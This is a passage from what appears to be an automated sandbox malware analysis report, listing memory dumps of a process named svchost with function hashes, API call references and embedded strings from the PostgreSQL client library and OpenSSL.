• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8298
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82B4
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82C8
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D82F4
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8308
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36D8329
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00007FFDA36D833D
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: free$_strdup
• String ID: dbname$invalid connection option "%s"$out of memory
• API String ID: 2653869212-1314129510
• Opcode ID: f5408ca813a42b3ef6f7a598e279f63f3b83428493f5e4a10dc021c0c1bfddf1
• Instruction ID: 8d71f7315f0a69efdb56bfc938c5b5836e9dcb8fbcde693c8ce8a52a167dce1d
• Opcode Fuzzy Hash: f5408ca813a42b3ef6f7a598e279f63f3b83428493f5e4a10dc021c0c1bfddf1
• Instruction Fuzzy Hash: E3D15F23B0AE8285FB549F21D4643B927A2EB45FC4F4C6435CA0E6A796DF3ED485C348
APIs
Memory Dump Source
• Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
• Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
• Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
• Opcode ID: d5869089b7538650f93e8616bfd7583218181241b394b9961a5364e3f8ad7780
• Instruction ID: 03f406f6b236e454a9f4d31ac2eb541cc2217968f409fbce2251508133426ba2
• Opcode Fuzzy Hash: d5869089b7538650f93e8616bfd7583218181241b394b9961a5364e3f8ad7780
• Instruction Fuzzy Hash: 141146559AE06A8BA610A3F84CA83AEEF408F9735D7D43F33D81C477909BDCCC915552
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd8fcd89a24216c047be750cc5224a058dc707010c3e0da2b1786282fe694ccf
                                                                                            • Instruction ID: 574f5ddffc6bb407740e15ad5975e7d4628a6afe26436139f9963368e3c94f9d
                                                                                            • Opcode Fuzzy Hash: cd8fcd89a24216c047be750cc5224a058dc707010c3e0da2b1786282fe694ccf
                                                                                            • Instruction Fuzzy Hash: C0410B2165E5458BE6009BE58898B5EFF98FB067D8BC52932DE5E47340DF78CC52C380
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$libintl_dgettext
                                                                                            • String ID: ,,n=,r=%s$SCRAM-SHA-256-PLUS$could not encode nonce$could not generate nonce$could not verify server signature: %s$error received from server in SCRAM exchange: %s$incorrect server signature$invalid SCRAM exchange state$malformed SCRAM message (empty message)$malformed SCRAM message (garbage at end of server-final-message)$malformed SCRAM message (invalid server signature)$malformed SCRAM message (length mismatch)$out of memory$p=tls-server-end-point
                                                                                            • API String ID: 2163055111-3039780039
                                                                                            • Opcode ID: fa4a2e4af99a1d5292963634b54f110a9bfa9d3d816a9145af9d4e2025d15e3b
                                                                                            • Instruction ID: 954a9bc64648b8f0b4d0577a27781ef73d75448f7ddc7776f4cbf87b78015c47
                                                                                            • Opcode Fuzzy Hash: fa4a2e4af99a1d5292963634b54f110a9bfa9d3d816a9145af9d4e2025d15e3b
                                                                                            • Instruction Fuzzy Hash: A9C1A362B0EA8689FA549B11D4703B92762BF457C0F4C6031DA4E27797DFBEE445C308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$closesocketsocketstrncat
                                                                                            • String ID: PQcancel() -- WSAIoctl(SIO_KEEPALIVE_VALS) failed: $PQcancel() -- connect() failed: $PQcancel() -- no cancel object supplied$PQcancel() -- send() failed: $PQcancel() -- socket() failed: $error $gfff
                                                                                            • API String ID: 3025912874-344502696
                                                                                            • Opcode ID: 1573148f15ac375fbaf4c0bc4df01dfdff759a82d90a0f71a6f006e318c2109d
                                                                                            • Instruction ID: 4b872187ac8160070f12b59c45509e3992cfbec8a088870f9a82e25c16e8eaea
                                                                                            • Opcode Fuzzy Hash: 1573148f15ac375fbaf4c0bc4df01dfdff759a82d90a0f71a6f006e318c2109d
                                                                                            • Instruction Fuzzy Hash: B561C422B0AA5287F7148B25E42437827A2FF45B90F4C6231DA1E67BD6DF3EE404C758
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 76516bc330bf5717072f54d72c4cd070579e2d4aae22bd874a6b687f913bfa06
                                                                                            • Instruction ID: e17ba4ed0251743d4c0d0efd89c0b218fee602218e1488ca7f42eb18db0cee42
                                                                                            • Opcode Fuzzy Hash: 76516bc330bf5717072f54d72c4cd070579e2d4aae22bd874a6b687f913bfa06
                                                                                            • Instruction Fuzzy Hash: 42019E519AE02A8B9510B3F85CA83AEDF408F5735CBC43F33D85C47B908B9CCC929112
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$CreateDirectorystrchr$ByteCharCloseControlDeviceFileFormatFreeHandleLocalMessageMultiRemoveWide__acrt_iob_funclibintl_gettext
                                                                                            • String ID: \??\$\??\%s$could not set junction for "%s": %s
                                                                                            • API String ID: 4293683917-1643559437
                                                                                            • Opcode ID: cda09ec69d1d377b6f4f3d2055efd757c6d8233b465d06b524f0df8bf2f89b0e
                                                                                            • Instruction ID: fee2e3fa09c81fb861e9803ff76dce038747a957b4fb5701d9a6ab7eccd5159b
                                                                                            • Opcode Fuzzy Hash: cda09ec69d1d377b6f4f3d2055efd757c6d8233b465d06b524f0df8bf2f89b0e
                                                                                            • Instruction Fuzzy Hash: CC51A43170AB8286F7209F10E8247AA7762FF88754F481235DA9D67B96DF3ED5058B08
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1708
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1750
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1761
                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D17C8
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D17EB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1816
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D181F
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D185E
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDA36D1420), ref: 00007FFDA36D1867
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D18C6
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D1985
                                                                                              • Part of subcall function 00007FFDA36EBD40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EBD58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc$memcpystrcmp
                                                                                            • String ID: ,p=$,r=%s$SCRAM-SHA-256-PLUS$c=biws$c=eSws$could not calculate client proof: %s$could not encode cbind data for channel binding$could not encode client proof$out of memory
                                                                                            • API String ID: 1207038400-2601969620
                                                                                            • Opcode ID: f12a3d76f4b0ee92abc48bed4795ee9702bc244d5a88383c8a4ac88de3b9132d
                                                                                            • Instruction ID: b6ee6b699129bfcd9d4183a26d774b2712c4bc4ff18d9a19eb2cce364f418a4d
                                                                                            • Opcode Fuzzy Hash: f12a3d76f4b0ee92abc48bed4795ee9702bc244d5a88383c8a4ac88de3b9132d
                                                                                            • Instruction Fuzzy Hash: 0A815122F0AA4685FB40DBA5D8601BC2362BF45B84F5C2032DD0D6B766DF7EE549C348
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: ae96b8fd4d29a88afae375eff51ec1507d8c4e4b28cbf41c2ada3f9e8c9deeca
                                                                                            • Instruction ID: 0399383f2e8ee5e9b7dd2222e973a621b8aeb5446636d54a91f237d9c4cfe60f
                                                                                            • Opcode Fuzzy Hash: ae96b8fd4d29a88afae375eff51ec1507d8c4e4b28cbf41c2ada3f9e8c9deeca
                                                                                            • Instruction Fuzzy Hash: DFD14A66D2D2908AE3218FE994A031EFF819313349F845836F6E71B744D9BEC995CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_error
                                                                                            • String ID: ssl\statem\statem_clnt.c$tls_construct_client_hello
                                                                                            • API String ID: 4275876640-3515996699
                                                                                            • Opcode ID: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                            • Instruction ID: 40744d6d0dec15c7f1ad1acef1a1843ea117cb48f23492911b20447e1467792b
                                                                                            • Opcode Fuzzy Hash: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                            • Instruction Fuzzy Hash: 8DB1B161B0E68282FB60AF2294653BA1697AF45BC4F4C6031DE0DA77C7DF3EE5018359
                                                                                            APIs
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,00007FFDA36E3B2C), ref: 00007FFDA36E4766
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00007FFDA36E3B2C), ref: 00007FFDA36E47C7
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E47EC
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E48D4
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E49B5
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E49E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$__acrt_iob_funcmalloc
                                                                                            • String ID: %s$ %*s $ %-*s $%*s$%-*s$%s$</tr>$<th align="%s">%s</th>$<tr>$left$out of memory$right
                                                                                            • API String ID: 2678454269-3069757763
                                                                                            • Opcode ID: d07799e9799ad9d9cbbbf601a676d00b4c6089649752e3fc53550fcb8d24f395
                                                                                            • Instruction ID: ad2fee1b0854e4c6f46a848b742e19340dad65f275cd6ce43e54fc2796b586d9
                                                                                            • Opcode Fuzzy Hash: d07799e9799ad9d9cbbbf601a676d00b4c6089649752e3fc53550fcb8d24f395
                                                                                            • Instruction Fuzzy Hash: 2C91D162B0E6C649FB128F21E4657793BA6EB45B80F5DA031CA4D23797DE3EE449C304
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f345c3b3a6635b3bef1e636daf6e259eb9111e97f0940e7577f8acf8d8316648
                                                                                            • Instruction ID: 014d45c154ece06d65c182b44084f091cc6b24eca6fc87178b8c121239af04ea
                                                                                            • Opcode Fuzzy Hash: f345c3b3a6635b3bef1e636daf6e259eb9111e97f0940e7577f8acf8d8316648
                                                                                            • Instruction Fuzzy Hash: 0EC13552D4C2B947FA1816DD5C803ADEE81B33B7CDFC059B2CA665BB45D6A8CC83C285
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 79b172a9809d6d36bb60e132cc0a253c3a67b18847ccd8528808583213d05bf1
                                                                                            • Instruction ID: 7370841f1a2db6b6f95e04e7b1f327c710ee35ad5548ac5ab7102130fe4d5bce
                                                                                            • Opcode Fuzzy Hash: 79b172a9809d6d36bb60e132cc0a253c3a67b18847ccd8528808583213d05bf1
                                                                                            • Instruction Fuzzy Hash: E50168005AE15A8FA605A3F95CA93AEEF00DB5725CBD07F73C12C83681CBDCDC559162
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 5a9b6a69ca4161b9e4467e14409498a0b46f1e0686fdb288a2da727970e05430
                                                                                            • Instruction ID: 3965c9411f446cfaf19b0615955f3f886447c4a39c16928c575a7b8724fefeab
                                                                                            • Opcode Fuzzy Hash: 5a9b6a69ca4161b9e4467e14409498a0b46f1e0686fdb288a2da727970e05430
                                                                                            • Instruction Fuzzy Hash: 780168005AE15A8FA605A3F95CA83AEEF409B5735CBD03F73C16C87681CBDCDC559162
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 62976b3dd1c69234feecdb0dd1c7db40d8a03acb28632471c681a6e51e8a22bb
                                                                                            • Instruction ID: 64b46981cc7b88f7f4bb3d8b8f1ffbdabe7878647c766d48b3992e4b9308a69e
                                                                                            • Opcode Fuzzy Hash: 62976b3dd1c69234feecdb0dd1c7db40d8a03acb28632471c681a6e51e8a22bb
                                                                                            • Instruction Fuzzy Hash: BC0168005AE15A8FA605A3F95CA83AEEF009B5735CBD03F77C12C87681CBDCDC559162
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 8dab0fafdf5eb04351e9aadc300599113ce4e66e0723dcaf7fee12093ab501c1
                                                                                            • Instruction ID: 4164f02b0dda3970ffe75b4ac8c7cf4f31ee15beb78084a7f9787420872eb15b
